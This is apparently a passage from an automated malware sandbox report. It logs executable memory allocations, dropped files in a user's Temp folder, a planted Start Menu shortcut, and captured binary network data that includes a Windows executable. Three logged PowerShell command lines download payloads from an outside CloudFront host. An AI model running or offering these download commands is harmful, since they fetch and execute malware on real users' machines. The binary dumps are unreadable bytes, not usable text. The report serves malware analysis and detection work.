NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05135000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05136000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05137000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05138000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05139000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05140000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05141000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05142000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2024, 3:33 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05143000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\AppData\Local\Temp\nsbEF04.tmp\app.bat
file	C:\Users\test22\AppData\Local\Temp\i1.exe
file	C:\Users\test22\AppData\Local\Temp\nsbEF04.tmp\INetC.dll

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
cmdline	powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"
cmdline	powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')"

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\i1.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Temp\i1.exe
file	C:\Users\test22\AppData\Local\Temp\nsbEF04.tmp\INetC.dll

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 3, 2024, 3:33 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (32 events)

Data received	[
Data received	W6\|®6Â=ìÞÆIçB7WqÒ,ÄDOWNGRD Ò¨C$ñ+\|çtU=å kKÍbâµñm$4Àÿ
Data received	b
Data received	6`¨^\²/Yöù%CçiRáqãØ- NoöÈIÙ¶óV®+¶tëÏû&ãº.j;XGVÿ% pSÚtÃgh:ß@ZJNÏC;çVÖpËRî{}®:ç¼1ùEöÂ`ÏY+Ì4Gß¹ÞemÏ,¦¦çÞI\|fN£:m©µî4.º ¸3ßGë±k%ÙÎÑEF2pÞIC¶ls»dêaA¬ÉÔTß/Ç"²&ÌYThü¾/ÄUu@`U9£ð0í0Uÿ0ÿ0Uÿ0U_ßª×0+8¢¸mJò0U#0¿_·ÑÎÝô[U¬Ü×Â©ç0O+C0A0+0http://o.ss2.us/0!+0http://x.ss2.us/x.cer0&U00 http://s.ss2.us/r.crl0U 00U 0 H÷ #ãWÊ}éyLñUýÌSn>GßÆUò²6íSÄ]4(k¾ÇUügêË?²3ÍXøø/õ`ÔÎñÁÝ§uO¹mÞ÷º~@,íÁê»v3w SÝd«'ñiÕM^®ô¡Ãu§XD-ò<p¬ºi¶w1^,ü :Giðy_ôT¤^x`'ÎÂwÿ#Sw]ºÿêYçÛÏ¯ï$5zÆ}ö?ßõrTá©Y{¿R.F²dvHÓØyènVÌ®,×8äÊ [ÿ°¨4IßV©÷°_í3íG·0]ô
Data received	K
Data received	GAýøPú0:f;D#ïí×`¨kg3Ä§{åa~P1SjÙë¢J©ÆÄû\|ýFwm4ð5CwÆ[uRàh©"âÚÙ°þ+>ÂÈlóo´0~!v'eNèÅg£ÕÐ6îõµ)Þ"ÜÝ¯2:êËÉZIOFtK®ÃS¸óßÄeõT.ÿbÀ/\«VÐEß^æü:ÃÇÓ°pÌz1hòÞ1>ÊÕ²¼]FÒïíx0?gº×üSÖ¦ãî®RµýÌIesç]ÿ)É¨Q±b%ÁZÑ<ÝÊ'LBÇû¤äÃúàj9n©Ôµ*ë y6¦p.£ýwbÁ[êú¼¼QV4r)ì,q1Yy«>Å~Ê"¾Ô¹=JWË3V[N
Data received
Data received
Data received
Data received
Data received	0
Data received	üëJ õ6´ÞÂjþöÑÚ_)z.ÏÄRË«²NÄoÎ4;R¢³bÃ·¼H
Data received
Data received	ÏV3êAµðH¦<iÂòØ/cÜOÿ!¶aÄ´Xä8ÙxT9îú GçÂüær(ëã5 ÌvPÔ½%OÐyËª;Úë #ÍÙ3¼$Ê.]Ö}¥ÝjW¿¿®3Ëõ»ïä} ¤µPYÄS^}ù¶Ôÿ7Ø@BËÉ¾1fIçíB'}eiÏÉÚ\e áq9QaÉhøJCÔÀ1És¡eß/Cà Áj ÿpdPdª\:l®cúÖÕ×;·5sENüô:t)áóVl @Ô5¸ªâ»íÍäËÕXÖF¶Ð·§ÙÒ·Ö¡:êBI¨Ø;¥¾3t+Å¤¼âÿH÷Í2h«-àÍÑ0z[Ô4¼ª¹\ë}xÌîö¹W¤Y±´)DüW;ZÆµe6¬ËtËméá ¤UÊÉ#³*ööÓg$Å?»ÐæÏgZIîÈô>mZj~©¼÷ ,P[kÆ_7Y Ý±\
Data received	WÙ-n\Á,ÌJ%WïG`t vpb/DOWNGRD 5#6JòÄäv¹¤:Ùq{ñ-_àWfAsòú¸+JtËêÀÿ
Data received	GA~£5?÷oeâ]'á¸Óîþ¦3zj]Ë¦j±HW?ê5ûÃÛYÜE¬è¥Øv¶7<)2á½Vu#¥©Tµ¿Öuå¢(ô¾Õ -æQ®vë-ó¶un¼³±O»CáßFnSÕpðÕ&t=¯]ºø#ÙmîpHÄ÷Òn Ûv, »øÖ}Æ ´¼ÁðxÃ[+}Ã,£_Øì·47ÿRÜþ$¼¾ËðaÙüxXÔþÏqIÉÚ,Û+IåÆ<æu[iñÕFë èFTèÑ Å]6a«C¾Úm¤®D®÷\¹»C\|<£ºÝô{ÆYX.)öc7{F{9+R;$ot>ÕÎ«çUÚFmxB¿Ð
Data received	ÒNB±¦fl½+09ÊØQÿëô/6ûqö³$eéÍ±)KoQ-«ÞbZ
Data received	Ð
Data received	ÅÝíÖ/o]d `^VLý¢j2OÄrQ§]%wÃ±K«:Àe4ý\|7ë[ Njf~ÙþÈ-[w¡.üFñùñúç b¼EIZ #äÿÎ Ø3¤ È2Úè~wF¨]y=¦¤(bÜ,C7ìh Üsj Þäê\|S¦ptn=W¶§öþj^õ(¹àØ~C s×CÑcfûicÛ×> í6ÆHBÐ;Eghbâ{sNcÃ5©<üAEwepTx_ÜÔ7ûuy®0¡Ã`äþÎÌ¯©É zfÎwËÊíú§§F÷zÔ¬Tþ9Î ®$ !¼²7SC^sãÖÈÏ;ÅÔi Ã ðpÍiõhF`º;»ÒbÈÀ%U·ü`Y7#PºÙ³2×Ä}Ë¶¢Y =âêKØ{óõ1óHÖCÛ}*~xN OSl@ÅÞkQ`¤'xÀqÛ(ñÞ·f`8ÀË¾°m_-Oãë¤ÈPv0>§û¢,¢ÕDÁ¿(×9NÂf´n8QO¤#çë2õViÂ×½ñàÔd"
Data received	HTTP/1.1 200 OK Date: Fri, 03 May 2024 06:35:31 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 03 May 2024 06:30:01 GMT ETag: "74c01-61786d9769497" Accept-Ranges: bytes Content-Length: 478209 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $2×Çv¶©Lv¶©Lv¶©L{ävLj¶©L{äIL ¶©L{äHL]¶©LÎ:Ls¶©Lv¶¨L¶©LÃ(LLw¶©L{ärLw¶©LÃ(wLw¶©LRichv¶©LPELóSYdàüÞb?@ðc$_dt<°aù2à8Èi@p.textåûü `.rdata²ln@@.dataH&`ªn@À.rsrcù2°a4@@¹\¡èuhÛAè)YÃ¹d¡èÈhÑAè)YÃ¹P¡èhÇAès)YÃj¹X¡èÃj¹L¡èÃj¹`¡èûÃj¹T¡èîÃÌÌÌÌÌÌÌÌÌÌUìQQìòL$ò$èÝ]øòEøÄå]ÃUìQQQQò$è(%Ý]øòEøYYå]ÃUìVEñPèÇ1AÆ^]ÂÇ1AéÐUìVñèêÿÿÿöEtVèª)YÆ^]ÂUìE]ÃUìE8u3À]ÃPè×%Y]ÃUì}uE]Ã]éUì}uE]Ã]é<UìEE]ÃUìEÁ]ÂÇtAÁÃÇtAÃUì3À;MÀ]ÂUìVñèßÿÿÿöEtVè)YÆ^]ÂÃAÃUìEEAÁ]ÂÃAÃUìWùMèîÿÿÿPÏèæÿÿÿÈèÿÿÿÀtMVèÏÿÿÿÏðèÆÿÿÿ;Æ^u3À@ë3À_]ÂUìQÿuMèÿÿÿE]ÂUìQQÿuUøÿuRÿPÈèÿÿÿå]ÂUìVñMèXÿÿÿPÎèÿÿÿ^ÀtMè@ÿÿÿ;Eu3À@ë3À]ÂVñèêþÿÿÇAÆ^Ã¸°fAÃUìQÿueüè6YÀ¹¸fAEÈQMè Eå]ÂUìVñèöEtVèÓ'YÆ^]ÂéþÿÿVñèÿÿÿÇ¬AÆ^Ã¸ÈfAÃUìQeü}uMhÔfAè< ëÿuÿuèoÿÿÿEå]ÂUìVñèöEtVèf'YÆ^]ÂéÿÿÿVñè"ÿÿÿÇÈAÆ^Ã¸ìfAÃUìQÿueüèYÀ¹¸fAEÈQMèÆ Eå]ÂUìÿuè8YÀtè>ëè=MPÿuèôýÿÿE]ÂUìVñèöEtVèÎ&YÆ^]Âéöþÿÿ¸\¡Ã¸P¡Ãá4ïÆÃUìì SVñ3Û=@¡WuÌ~EèuSäöÿÿPSÿHA¡AMôEØ¡A]ôÇEÔ¹y7EÜè¡ÿÿÿ¡AEô?5Aj EÐ[ÇEäEäEèÁàÆÇEð@.ëí=@¡©Eü¡<¡DEðeð=@¡ë£<¡¡¨¡DEð£¨¡EôEèEðEèÁèEøMü3MðEøEÐ3ÁMü @¡Ç8¡î=êô
Data received	ÿÿÿèëÇu}äVèÉYÃUìE3Â+Â]ÃUììë ÿuè@@YÀtÿuèË YÀtæå]ÃjEüÇEüìAPMðèðÿÿhÈnAEðÇEðäAPèÌjh0pAèZèL·ðjèJY¸MZf9@t3Ûë3¡<@¸@PEuë¹f9@uÝ3Û¸t@v 9è@Ã]äèuDÀujèÜYèÑCÀujèËYèJeüèy8Àyjè±Yÿ°A£D¦¡è¥J£Eè9DÀyjèÑYèeFÀyj èÀYjèòYÀtPèYè¤NVPjh@èÛÙÿÿðuÜÛuVè-è°ë.MìEàQPè]?YYÃeèuàuÜ}äuVèèqÇEüþÿÿÿÆè\ÃUì=Ø3Euè±FÿuèGhÿè YY]ÃèýHéþÿÿ; AuóÃéNUìì VWjY¾ A}àó¥u}ötötéQpÿP }øuüötötÇEô@EôPÿuðÿuäÿuàÿ´A_^å]ÂPdÿ5D$+d$SVW(è¡A3ÅPeðÿuüÇEüÿÿÿÿEôd£ÃUìVüuN3ÎèFÿÿÿjVÿvÿvjÿuÿvÿuèÿ[Ä ^]ÃUìQSüEH3MèÿÿÿE@àftEÇ@$3À@ëlëjjEÿpEÿpEÿpjÿuEÿpÿuè¢[Ä Ex$uÿuÿuè-jjjjjEüPh#èÄEü]ck ÿà3À@[å]ÃUìì¡AMèeè3ÁMEðEEôE@ÇEì3@@MøEüd¡EèEèd£ÿuQÿuèÞMÈEèd£Áå]ÃXY$ÿàXY$ÿàXY$ÿàUìì8S}#u¸!B@M3À@é°eÈÇEÌd@@¡AMÈ3ÁEÐEEÔEEØEEÜE Eàeäeèeìeämèd¡EÈEÈd£ÇEüEEðEEôè?EøEðPEÿ0ÿUøYYeü}ìtd]Èdë EÈd£Eü[å]ÃUìQQES]VpHMøuüWþÛx3UþÿuèMMøUNkÆ9T};T~þÿu}üKuüÛyÐEF0E8E;xw;÷vè¾LMøkÆ_^[Áå]ÃUìQSEÀEüdd£E]mücüÿà[å]ÂUìQQSVWd5uøÇEü)C@jÿuÿuüÿuÿ¸AE@àýMAd=]ø;d_^[å]ÂUìMVuè¶=Nè¨=°Æ^]ÃUìVè=u;°uè=N^]Ãès=ë A;ðtÈyuñ^]é¶KFAëÒUìèE=ÀtM9t@Àuõ3À@]Ã3À]ÃUììSVWüEü3ÀPPPÿuüÿuÿuÿuÿuè@XÄ Eø_^[Eøå]ÃUìè}tèdÛâ]Ã¸¥@Ç´A¦@£°AÇ¸A"§@Ç¼A\|§@ÇÀA¨@£ÄAÇÈAÆ@ÇÌA:§@ÇÐA¢¦@ÇÔA§@ÃUì%EìS3ÛC Aj èÆÀL3ÉE3À¢V5AW}äÎ_OWEäMðEôñineIEì5ntel5AÈEè5GenuÈ÷ÙjÉXþÁjY¢_OWMìMøtCEä%ð?ÿ=Àt#=`t=pt=Pt=`t=pu=EÏ=Eë=E}ô\|5j3ÉuäX¢Æ5AXHMøPEè©t Ï=Eë3À÷ÁtMÎÇE5A÷Át2÷ÁtÎÇE5A¨ tÎ ÇE5A_^3À[å]ÃÌÌÌè7éë"è.ÙÉëÙáÙèé2ÉëÆpÿÿÿþÙáÙÉÙáÙÉÙó ÉtÙëÞá ítÙàÃÙáÙÀÙÀÙèÞáÙÉÙèÞÁÞÉÙäÝ½`ÿÿÿöaÿÿÿu2íÙúÃXéªcÝØÛ-J1AÃÝØ ÉtÝØÙë ítÙàÃÝØÙî ít÷ÙàÃÝØécÝØÍëèÉÿÿÿécÌÌÌÌÌÌÌÌUìÄ0ýÿÿSÙ½\ÿÿÿ=àAtèb8ýÿÿè[ÉÃÙÉÝzÿÿÿÙÉÝUëÝUìÄ0ýÿÿSÙ½\ÿÿÿ=àAtèca8ýÿÿ¥8ýÿÿýèS[ÉÃÝzÿÿÿëÝUìÄ0ýÿÿSÿuÿuèÄÿuÿuèÄÙ½\ÿÿÿ8ýÿÿèsaè[ÉÃ¥8ýÿÿþ=EuOÝ0ýÿÿpÿÿÿ Àt<ÿt[<þt? Àt3¾À
Data received	EüEMäS]VW}j^VQMÔQÿpÿ0èv8ÄÿuèÀ§ÿÿ0èJ§ÿÿÆëtuöu è©§ÿÿj^ëäÉÿ;ñt3ÀÎ}Ô-À+È3ÀÛÀ+ÈEÔPCPQ3É}Ô-Á3ÀÛÀÏÁPè6ÄÀtÆëÿuEÔjPÿuSVWèõýÿÿÄMü_^3Í[èªÿÿå]ÃUììEMìSVÿu@HEüè¯´ÿÿuöt}wè§ÿÿj[è¦ÿÿé3ÛW}8]tMü;ÏuU3À:-ÀÁfÇ00E8-uÆ-F@ÀjVè¸YÆ0FYëðÿ~JjVè¢EìYYFE@Ày&8]tø÷ßë÷Ø;ø\|øWVèlWj0Vè¸Ä_}øtMôapý^Ã[å]ÃUìì,¡A3ÅEüEMäSW}j[SQMÔQÿpÿ0èÀ6Äÿuè ¦ÿÿè¥ÿÿÃëlVuöuèò¥ÿÿè\|¥ÿÿÃëSÉÿ;ñt 3ÀÎ}Ô-À+È]EÔPEØÃP3À}Ô-QÀÇPèæ4ÄÀtÆëÿuEÔjPSVWègþÿÿÄ^Mü_3Í[èýÿÿå]ÃUìì0¡A3ÅEüEMäSW}j[SQMÐQÿpÿ0èÿ5ÄÿuèI¥ÿÿèÓ¤ÿÿÃé§Vuöuè.¥ÿÿè¸¤ÿÿÃéEÔ3ÉH}Ð-EàÁÈÿ9;ðtÆ+ÁMÐQÿuPSè&4ÄÀtÆëSEÔH9EàÁøü\|+;E}&Ét CÀuùCþÿuEÐjPÿuVWèýÿÿÄëÿuEÐjPÿuÿuVWèIûÿÿÄ^Mü_3Í[èþÿÿå]ÃUìjÿuèYY]ÃUììWÿuMðèý±ÿÿU}ð Ét:ÈtB ÉuõBÀt4ë <et<EtBÀuñVòJ:0tú:uJBFÀuö^}ü_tEø`pýå]ÃUìjÿuÿuÿuèÄ]ÃUìQQ}ÿuÿutEøPèMEøEüAëEPèMEÄå]ÃUìjÿuèYY]ÃUììMðVÿuè±ÿÿu¾Pè91øeëF¶Pè¼/ÀYuñ¾Pè1YøxuÆEðFÈFÀuó^8EütEø`pýå]ÃUìEÙîÜßàöÄAz3À@]Ã3À]ÃUìW}ÿtVuVèÐÿÿ@P>VPè
Data received	þÿÿÿl@u@@ @ÿÿÿÿÿÿÿÿTrA"drAtrAþÿÿÿÔÿÿÿþÿÿÿ"@&@â@ÜrAèrAoAEÿÿÿÿ@þÿÿÿØÿÿÿþÿÿÿ?@þÿÿÿØÿÿÿþÿÿÿy®@®@þÿÿÿÔÿÿÿþÿÿÿ?²@þÿÿÿÐÿÿÿþÿÿÿº³@þÿÿÿÐÿÿÿþÿÿÿó¸@þÿÿÿÔÿÿÿþÿÿÿV¼@þÿÿÿØÿÿÿþÿÿÿÄ@þÿÿÿÐÿÿÿþÿÿÿgÅ@þÿÿÿÈÿÿÿþÿÿÿÃÎ@þÿÿÿØÿÿÿþÿÿÿ1Ð@þÿÿÿÌÿÿÿþÿÿÿÒ@¨tìx tyúx8vLv^vvvv¢v°vÄvÜvðvww w0wBwTwdwzww$v°wÀwÖwæwöwxx*x6xFxbxrxxx¨x¾xÔxwvy&y6yRydyvyyy¢y®y¼yÒyèyôyz$z4zBzZzlzzzz¢z®zÈzâzüz{2{P{x{{{¨{´{Â{Ð{Ú{ì{ø{\|\|"\|2\|D\|X\|h\|\|\|\|¤\|ûGetFullPathNameWGetComputerNameA]CommConfigDialogA>LoadLibraryExWïInterlockedIncrementGetConsoleAliasAëInterlockedDecrementBackupSeekGetModuleHandleW®GetWindowsDirectoryAEnumTimeFormatsA%SetCommState³GlobalAlloc¶GlobalFindAtomA?LoadLibraryWÁTerminateThreadGetLocaleInfoW$WriteConsoleWGetModuleFileNameWoGetSystemDirectoryAhGetACPgMultiByteToWideCharGetTempPathW°GetConsoleOutputCPGetLastErrorsSetLastErrorEGetProcAddressCreateHardLinkWCreateEventWAddAtomAÃGlobalUnWireÉDebugSetProcessKillOnExit:BuildCommDCBAïVirtualProtect£GetVersionExA¸ReadConsoleInputWÁGetCurrentProcessIdaSetFileAttributesW§GetVolumeInformationWKERNEL32.dllåDeleteMetaFileGDI32.dllêEncodePointerÊDecodePointerIsProcessorFeaturePresentGetCommandLineW±RaiseExceptionRtlUnwindIsDebuggerPresentÏHeapFreeËHeapAllocExitProcessGetModuleHandleExWWideCharToMultiByteÔHeapSizeîEnterCriticalSection9LeaveCriticalSectiondGetStdHandleóGetFileTypeÑDeleteCriticalSectioncGetStartupInfoWRCloseHandleÅGetCurrentThreadIdJGetProcessHeap%WriteFile§QueryPerformanceCounteryGetSystemTimeAsFileTimeÚGetEnvironmentStringsWaFreeEnvironmentStringsWÓUnhandledExceptionFilter¥SetUnhandledExceptionFilterãInitializeCriticalSectionAndSpinCount²SleepÀGetCurrentProcessÀTerminateProcessÅTlsAllocÇTlsGetValueÈTlsSetValueÆTlsFree IsValidCodePage7GetOEMCPrGetCPInfoÒHeapReAlloc-LCMapStringWGetConsoleCP¬GetConsoleModegSetFilePointerExSetStdHandleWFl
Data received	ushFileBuffersOutputDebugStringWiGetStringTypeWCreateFileWus ! 5A CPR S WYl m pr ) ¡¤§ ·Î×? ¡ ¡8"A@"ANæ@»±¿Dsqrtðøÿÿÿÿÿÿÿï´!A¸!A¨!A¬!A¬"A´"A!¼"A¼!A Ä!AÔ!AÄ"A"Aô!Aø!A ü!AÜ!Aä!AÌ"Aì!AÔ"AÜ"Aä"Aì"Aô"A"ü"A##A$#A%#A&#AD0ÿÿÿÿ ÿÿÿÿÿÿÿÿ¬Ý@¬Ý@¬Ý@¬Ý@¬Ý@¬Ý@¬Ý@¬Ý@¬Ý@¬Ý@& abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
Data received	]T$^1iÆñÙ6G ëGÍéÞK&Ý×ú-)Sv`¤W4¼%ÚKãªËBn¾»úCz¥ëÜXâ`¹¶jãÈ>ÏhANÛ#è±+(ós¤G{ºOé¶=Ä&Û©qòªAÐ+EMòÙÛøsàTß¶!·i,ªÍ½ÑÔ¢¶ÈR¡¯¸!_5L.«s«¥füð=§ý³.°xù5ÁË¡]¦DE¸x÷óðö\|Å¬\|{õ°¥Ð²\| QWo-Bðg@ò59ýö·êFù)Cb%_MÙ¡hÄ2.Þ.ë'[iJaÁfÅ&ac×êN®ª±§8h¥÷Q,ª¼ý]&°QòÒÖ¯7ZÁÔÙÏXäÂÃQGÀyZ®é 8kX6t÷6UqKëê¹ ðèG¼ë1Ê»µu)â`r¢ÊÞU uf]<ýCL"n3\8& ^¨´ÒtC¯C×/câõ,£ Í¼²1S4h+¤Î®,v£µ£t¯n®Ð sñkìé 4ë5¾í=© ãt% R¶¤¦I4Û£ñÛòø«£øRÞÓæ©äìUm_E7¢ðò^ÞøñÜ&Õ6ßXßµ0(]~jZAq§mMH¯1Dô} xacUo«.OplPS×ù9«übÎÐ¨æHÂã¸Û ?ßÏgLZl&ü4æ§.pa)Â^µà\|TçiYE6¼Õ`×qT¿í£ g®¸TBmúU³®ì^<Mr%w$GËÄ5òOôé.Ô7ÌBýÌdüE(%·{uÇÃ9a×¤Ðê ùÒú&c(!v&Çáb«møÝUó¬ç³ò¥¹K[½8½TêJ1z,ªa&6´òàAÔe+\òm¨,ÑîH;Y¼±[«,:Qj74ðQ~ÇÖ¢èRéÇDÛs¸@\Ñ°3£®ôÏ{5åFÍÉßõøFî ³YØ8+¼/yÛî«"ApRÞAôðË¸W÷»nj¯:¶áìDü«Ðî~mÖÜÐà,[£¢v¤¼[yV¬³ÉÅ·¥¦iêCÎÿB¢H$6<EX<6zÿìöÖJÁIZ½vþAÙ&,ISYn:!DÛÂø^juÞÂÆw ¼ÆÁHÑÕQã=¿×uÜÔö0ñ{¾Áp@`¡"=ÝÓÊQ,QëþêC5ËöÀÐBn6Èæ=·câ©tOø¡®6ç^¸_x\|×û,ð·âOr³1Ì8%^î¬»5äñjüÌe4[N xÒÞ`[¬¶joìm®È0ê7h ¬ùnãlÛc8»GDQBÙX´é÷GÝA ÛåÿøyØQ SA])%ùÕO'ôÖÅ¨°ÖçwÕ/øÊO©YÅÖ¸×ºÅ&ä7øÞþÉììð¼ÉfS´ÅRÔÿC>s ¨!ÉXç'kçQåRE?Æ@ ÉªaH;6zUJzð!Ç TÓ6çs!¥+>§[Ró¦Q:zýI¤=¿ëÖ`-îþnßf±äÜ¨è¹sp]bRèé`C·Þcô^!;ó, %ÇBî¬ª1ÒÙ\÷CqâÉùôÞ0½ºh{fóGoÝiLf_=ÿuà9j%Ä¹Tù{ÏMRUþ=Kr&¤CÃ>e_ÌÊ"ßI¤mý(Ú0U<ÃGÓHg_Gêº»XzÚþë.kbÞÎó"æä@àmq÷âåà±.gr}JvÌA Bèk1Øo"µæLkóTìµ.b,hçsÍWOJ¡àµ§o3%#ÆåÑ2öôáúºÇ13ÁH²95ø%N»¹¡GX,ùÓ±PNW-¦LLªWèq&RXé`ïwZìJX~¾dG:¼¨¦èOoïNbË¬¤þoyù½öÒ6©4é1mRÚôÔØi×§¿P²»êZÁâVVÇÅaþëMØ}Y@d;k¼?£\|µë´^ÓÒ´>¶uå0öN¹ËÛÛûw¶ñ¤Ìïwûâìs\|É%Ä±ÈB(Ý+ÍÈp> ¥=Ã¸½2ÂÒøeº²QyrìkQ^SQÒo0anÓ rþN±ùoÄoaóþcR+¾][\|}xpÝû£nuá!78ùaØüâ1`´?Õ\îÑô:=U(hjç2=Ó¡Í" ²4íwGM²°Qr:É=ty EWñ>@ZZ¤áÕ°gc?þ¢õ¦"ºæl]énýg³Ã3x/»T{+fª^>®!¥Ì¯£\|ædxjW½_YÊÃT¸ïw=>tÂ¥"ôdÿLÇMôå¼m3íÐ á[²/·ØTN¬Ç_È,lÈ+æ7¦Ëås²ÈZÇAgR[¶ø´ÓGûSj@ñ± wd8;8.¿b«ú¨[tùº¼EÆÞWß";ñ¹,VÞ,Üÿw`(dàpÑîmúe¨Îí¨? íÐ+Wá^ÁïVoCAðrÂ£³ãëÉr§=`ÏÕ¾y2æÊ{6½8àìÁà.ìvrYñËbÍÜ05&«oúP ù-ek~ê®Ãxc¯º>é$ÞÀ}¦Ü·F(ÃnÙyÊ[ýzß¼À¯=¸JDÉ~Æ9¤R{þÓG"^A~E=¢P1&R}Y§Úa4ôÖtø ÐBOÃO-àE½½~ÖBÎ¦ï+ëÒ×â´ýP?Ãe¸Ö4QbhÞõ°º{pzdöBP®¥ö}Ïrå¤2®ÈM¶Ë1I/µ-Ä9ôZÔðõæ1¦û:ïØoj¾`°b\l¹[ >²®ôYlÕê'JTÖÈßM6ro6¬Péÿå¶®3@ø!äí¶{p°ÇqÑeØf¼qÓÕ?YcGðG¢ý mÄwy¤É¢Ýæ ±Ç©õ5Õ+Ó¦Ø&pâO÷ØÖ$ü`E:ðwôº½¢ÚCüñï ÷ÑÊG øµf~MQáÅÐo[gô¡5n¬
